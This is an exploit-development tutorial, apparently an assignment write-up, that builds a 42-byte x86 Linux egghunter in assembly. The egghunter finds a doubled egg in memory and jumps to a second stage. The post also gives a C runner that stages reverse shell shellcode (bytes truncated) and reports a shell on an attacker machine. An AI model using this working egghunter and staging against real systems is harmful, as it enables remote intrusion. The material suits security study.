Introduction

An egghunter is a small piece of code that scans the process virtual address space (VAS), the entire range of virtual addresses that the OS makes available to a process, looking for the egg. The egg is a byte sequence defined by the attacker and prepended to the second stage shellcode, which is placed somewhere else in the VAS at an unknown address.

Once the egg is found, the egghunter code redirects the flow there, so that the second stage shellcode gets executed.

This technique is often used when the buffer space controlled by the attacker is too small to hold the whole shellcode. In that case, an egghunter can be used as a first stage payload, to search for and jump to the second stage payload placed somewhere else in memory.

Egghunter prototype

Requirements

The egghunter:

  1. must be able to search the entire process VAS, and avoid accessing invalid memory locations, which would cause the program to crash.
  2. must be able to locate the egg sequence in the VAS, and distinguish it from the one in its code.
  3. must be small enough to be stored in the limited space controlled by the attacker.

Access syscall

In order to fulfil the first requirement, we can use the access system call. Below is the function signature from unistd.h:

#include <unistd.h>

int access(
    const char *pathname,   // address of memory page
    int mode                // accessibility checks to be performed (r/w/x)
);

As we can see, access is intended to check a user’s permissions for the file whose path string is stored at pathname. However, we can pass an arbitrary memory address as the pointer and use the syscall to check whether that memory is accessible: the kernel has to read the path string from that address, and it reports an error if it can’t.

Depending on the return value, we can determine whether the memory page can be accessed. When the address we specified belongs to a memory page that can’t be accessed, the syscall returns -EFAULT. EFAULT is errno 14, so EAX holds -14 (0xfffffff2) and its low byte, AL, is 0xf2. The access syscall itself is number 33 (0x21) in /usr/include/asm/unistd.h.

When we get an EFAULT we can move directly to the start of the next memory page (pages are 4096 bytes long), so that we don’t waste time probing other addresses in the same page, which would result in an EFAULT as well.
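The probing idea can be tried from C before writing any assembly. Below is a minimal sketch, assuming a Linux system; the helper name probe_address is hypothetical and not part of the original code. It only reports whether the kernel faulted while reading a path string at the given address.

```c
#include <errno.h>
#include <stdbool.h>
#include <unistd.h>

/* Hypothetical helper (not from the post): returns false when access()
 * fails with EFAULT, i.e. the kernel could not read a path string
 * starting at addr, and true in every other case. */
static bool probe_address(const void *addr)
{
    errno = 0;
    /* F_OK is mode 0, the same value the egghunter leaves in ECX.
     * We do not care whether a file exists, only whether the kernel
     * faulted while reading the string at addr. */
    if (access((const char *)addr, F_OK) == -1 && errno == EFAULT)
        return false;
    return true;
}
```

Any other outcome, such as ENOENT because no file with that name exists, means the address could be read, which is all the egghunter needs to know.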

Code optimization

In order to minimize the chance of collisions (false matches, including the copy of the egg inside the egghunter itself) when moving through the process VAS, the egg is usually inserted twice before the second stage shellcode.

Also, instead of using 4 random bytes for the egg, we can use the bytes that correspond to the nop and push <register> instructions, so that once the egghunter finds the egg, it can jump directly to that address.

For instance, we can use 0x90509050 as the egg. Stored in little-endian order its bytes are 50 90 50 90, which decode to push eax and nop repeated twice:

$ msf-nasm_shell
nasm > nop
00000000  90                nop
nasm > push eax
00000000  50                push eax

By doing so, we can minimize the size of the egghunter, which is used as the first stage payload. If 4 random bytes were used for the egg, the egghunter would also have to calculate the offset needed to land at the beginning of the shellcode placed after the 8-byte egg sequence.
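To make the memory layout concrete, here is a small sketch of how the second stage buffer could be assembled. The helper build_second_stage and the EGG macro are assumptions made for illustration; the original runner simply hardcodes the bytes in a string.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define EGG 0x90509050u  /* same value the egghunter compares against */

/* Hypothetical helper: writes EGG twice in little-endian byte order,
 * followed by the payload. Returns the number of bytes written,
 * or 0 if the output buffer is too small. */
static size_t build_second_stage(uint8_t *out, size_t out_len,
                                 const uint8_t *payload, size_t payload_len)
{
    assert(out != NULL && payload != NULL);
    if (out_len < 8 || payload_len > out_len - 8)
        return 0;
    /* Least significant byte first: 50 90 50 90 50 90 50 90 */
    for (size_t i = 0; i < 8; i++)
        out[i] = (uint8_t)(EGG >> (8 * (i % 4)));
    memcpy(out + 8, payload, payload_len);
    return 8 + payload_len;
}
```

Because every egg byte is a valid one-byte instruction, execution can start at out[0] and simply run through the egg into the payload.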

Egghunter shellcode

Clean registers

The first thing that needs to be done is clearing the registers that will be used later on. In order to avoid null bytes, we can use the xor instruction and XOR each register with itself.

xor eax, eax
xor ecx, ecx
xor edx, edx

Defining the egg

Next we move the 4-byte sequence we decided to use as the egg into ESI.

mov esi, 0x90509050     ; 4-byte egg, in memory: 50 90 50 90 (push eax, nop, push eax, nop)

Searching for the egg

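We start by using the or instruction to set the low 12 bits of EDX, which we use as a pointer, so that it points to the last byte of the current memory page. Incrementing it by one then moves it to the first byte of the next page. Doing it this way, rather than adding 0x1000 directly, keeps null bytes out of the shellcode.

next_mempage:
    ; pages are 4096 bytes long: setting the low 12 bits moves EDX to the last byte of its page
    or dx, 0xfff            ; EDX = EDX | 0xfff

next_byte:
    inc edx                 ; EDX = EDX + 1 (right after the or: start of the next memory page)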
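The page arithmetic is easy to check in C. This is a sketch with a hypothetical function name, assuming 32-bit addresses and 4096-byte pages as in the rest of the post:

```c
#include <stdint.h>

#define EGG_PAGE_OFFSET_MASK 0xfffu  /* low 12 bits: offset inside a 4096-byte page */

/* Mirrors "or dx, 0xfff" followed by "inc edx". */
static uint32_t next_page_start(uint32_t addr)
{
    addr |= EGG_PAGE_OFFSET_MASK;  /* last byte of the current page */
    return addr + 1u;              /* first byte of the next page */
}
```

For example, next_page_start(0x08048123) gives 0x08049000. An address that is already page aligned also moves forward by a full page, which is why the egghunter only takes this path after an EFAULT.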

Then we need to:

  • reset EAX and move the number of the access syscall (0x21) into it.
  • move the memory address that we want to check (*pathname pointer) into EBX.
  • compare the return value with the one that corresponds to the EFAULT error code (0xf2).

xor eax, eax
mov al, 0x21            ; sys_access call
lea ebx, [edx+8]        ; pathname = EDX+8, just past the 8 bytes we want to compare
int 0x80
cmp al, 0xf2            ; check if the value returned is EFAULT code

If the low byte of the value returned in EAX is the EFAULT error code, we use a conditional jump (je) to go back to the next_mempage label, which moves EDX to the start of the next page.

Otherwise the address belongs to an accessible memory location, so we compare the 4 bytes at EDX with the egg, and move forward one byte at a time until they match.

; if no EFAULT occurred, search egg
cmp [edx], esi
jnz next_byte

; if the first 4 bytes correspond to the egg,
; test the following 4 bytes (egg is repeated twice)
cmp [edx+4], esi
jnz next_byte
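The two comparisons can be modelled in C on an ordinary buffer. The function below is a hypothetical illustration, not the author's code; it shows why a single copy of the egg, like the one embedded in the egghunter's own mov instruction, is not reported as a match.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the two cmp instructions: returns the offset of the
 * first position where the 4-byte egg appears twice in a row, or -1. */
static ptrdiff_t find_double_egg(const uint8_t *buf, size_t len,
                                 const uint8_t egg[4])
{
    assert(buf != NULL && egg != NULL);
    for (size_t i = 0; i + 8 <= len; i++) {
        if (memcmp(buf + i, egg, 4) != 0)       /* cmp [edx], esi   */
            continue;
        if (memcmp(buf + i + 4, egg, 4) != 0)   /* cmp [edx+4], esi */
            continue;
        return (ptrdiff_t)i;
    }
    return -1;
}
```

If the buffer holds the bytes of mov esi, 0x90509050 (be 50 90 50 90) and, further on, the doubled egg, only the offset of the doubled egg is returned.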

Egg found

When the whole 8-byte sequence matches, we can jump to the egg address held in EDX. The egg bytes are then executed as harmless nop and push eax instructions, followed by the second stage shellcode.

jmp edx

Final shellcode

Below is the complete shellcode for the egghunter:

global _start

section .text
_start:

    ; reset registers
    xor eax, eax
    xor ecx, ecx
    xor edx, edx

    mov esi, 0x90509050     ; 4-byte egg, in memory: 50 90 50 90


next_mempage:
    ; pages are 4096 bytes long: setting the low 12 bits moves EDX to the last byte of its page
    or dx, 0xfff            ; EDX = EDX | 0xfff

next_byte:
    inc edx                 ; EDX = EDX + 1 (right after the or: start of the next memory page)
    xor eax, eax
    mov al, 0x21            ; sys_access call
    lea ebx, [edx+8]        ; pathname = EDX+8, just past the 8 bytes we want to compare
    int 0x80
    cmp al, 0xf2            ; check if the value returned by the access call is EFAULT
    je next_mempage          ; if EFAULT, we can move to next memory page


    ; if no EFAULT occurred, search egg
    cmp [edx], esi
    jnz next_byte

    ; if the first 4 bytes correspond to the egg,
    ; test the following 4 bytes (egg is repeated twice)
    cmp [edx+4], esi
    jnz next_byte

    ; if the egg matches again, we have found the 2nd stage shellcode
    ; so we can jump to it
    jmp edx
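For readers who prefer C to assembly, the control flow above can be approximated as follows. This is only a sketch under stated assumptions: the function hunt and its end bound are hypothetical (the real egghunter has no upper bound and keeps walking the address space), it returns the address instead of jumping to it, and it probes before advancing rather than after. The caller must make sure the first 8 bytes at start are readable.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical C model of the loop: scans [start, end) and returns the
 * address of the first doubled egg, or NULL if none is found. */
static const uint8_t *hunt(const uint8_t *start, const uint8_t *end,
                           const uint8_t egg[4])
{
    assert(start != NULL && end >= start && egg != NULL);
    const uintptr_t page = (uintptr_t)sysconf(_SC_PAGESIZE);
    uintptr_t p = (uintptr_t)start;

    while (p + 8 <= (uintptr_t)end) {
        errno = 0;
        /* int 0x80 + cmp al, 0xf2: did the kernel fault reading at p + 8? */
        if (access((const char *)(p + 8), F_OK) == -1 && errno == EFAULT) {
            p = (p | (page - 1)) + 1;           /* next_mempage */
            continue;
        }
        if (memcmp((const void *)p, egg, 4) == 0 &&
            memcmp((const void *)(p + 4), egg, 4) == 0)
            return (const uint8_t *)p;          /* jmp edx in the shellcode */
        p++;                                    /* next_byte */
    }
    return NULL;
}
```

Calling hunt on a buffer that contains one isolated copy of the egg and, later, the doubled egg returns a pointer to the doubled egg.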

Shellcode testing

We are almost done. All we need to do is assemble and link the shellcode using nasm and ld respectively, then extract the opcodes using objdump plus some bash fu, and add them as a string variable to a simple C shellcode runner that passes control to the shellcode.

To give the egghunter something to find, we also need to add the egg twice (byte-reversed, since x86 is little-endian), followed by the reverse shell shellcode, as another string variable inside the shellcode runner.

After doing all the above operations, the shellcode runner should look something like this:

#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <unistd.h>

// Egghunter shellcode
const unsigned char code[] = "\x31\xc0\x31\xc9\x31\ [...]";
// EGG + EGG + Reverse Shell shellcode
const unsigned char second_stage[] = "\x50\x90\x50\x90\x50\x90\x50\x90\ [...]";

int main(void) {
    // Copy the second stage into a fresh RWX mapping for the egghunter to find
    unsigned char *sc_ptr = mmap(0, sizeof(second_stage), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    if (sc_ptr == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(sc_ptr, second_stage, sizeof(second_stage));
    // Note: sizeof also counts the string literal's terminating NUL byte
    printf("Shellcode length: %d bytes\n", (int)sizeof(code));
    // Pass control to the egghunter (assumes the build leaves code[] executable)
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}

As always let’s test that everything is working by compiling and running the executable (./run_sc in our case).

Bingo! The egghunter shellcode is just 42 bytes, which is about half the size of the reverse shell shellcode.

The egghunter is able to locate the second stage payload in memory, and jump to that address. The result is as expected a reverse connection to the attacker machine on port 443, with a bash shell.

Wrapping Up

In this post we have discussed how an egghunter helps when we only have a small buffer to write our shellcode to. As always, if you want to check out the code used to complete this assignment, you can refer to the following repository on my GitHub.

References